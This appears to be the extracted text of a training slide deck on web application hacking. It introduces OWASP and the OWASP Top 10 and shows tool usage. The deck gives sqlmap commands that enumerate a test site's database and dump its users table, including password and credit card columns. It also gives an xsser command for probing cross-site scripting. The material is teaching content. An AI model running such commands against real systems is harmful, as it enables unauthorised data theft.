Web Application Hacking
Web Application Hacking
MODULE OBJECTIVE
The course will focus on common security threats to web applications and what
are countermeasures strategies available. The primary aim of the course is to
educate developers, designers, architects and organizations about the
consequences of the most common web application security vulnerabilities and
methodology to protect against such vulnerabilities. At the end of this course you
will learn:
Topics:
Introduction To OWASP.
OWASP Top 10.
✔
3
INTRODUCTION TO OWASP
INTRODUCTION TO OWASP
5
OWASP TOP 10
OWASP TOP 10
7
WHAT CHANGED FROM 2017 TO 2021?
8
TOOLS FOR WEB APPLICATION HACKING
TOOLS FOR WEB APPLICATION TESTING
10
SQL INJECTION WITH SQLMAP
SQL INJECTION
●
sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test --
dbs
●
sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D
acuart --tables
●
sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D
acuart -T users –columns
●
sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D
acuart -T users -C name,pass,email,phone,address,cc,cart --dump
12
CROSS SITE SCRIPTING (XSS) WITH XSSER
CROSS SITE SCRIPTING (XSS)
Usage:
●
sudo xsser -u ’ http://test.vulnweb.com’ -g ‘/listproducts.php?cat=XSS’
14
SUMMARY
SUMMARY
servers, and application design flaws, they can be exploited to compromise the
application’s security. These vulnerabilities are not the same as other common
types of vulnerabilities, such as network or asset. They arise because web
applications need to interact with multiple users across multiple networks, and
that level of accessibility is easily taken advantage of by hackers.
16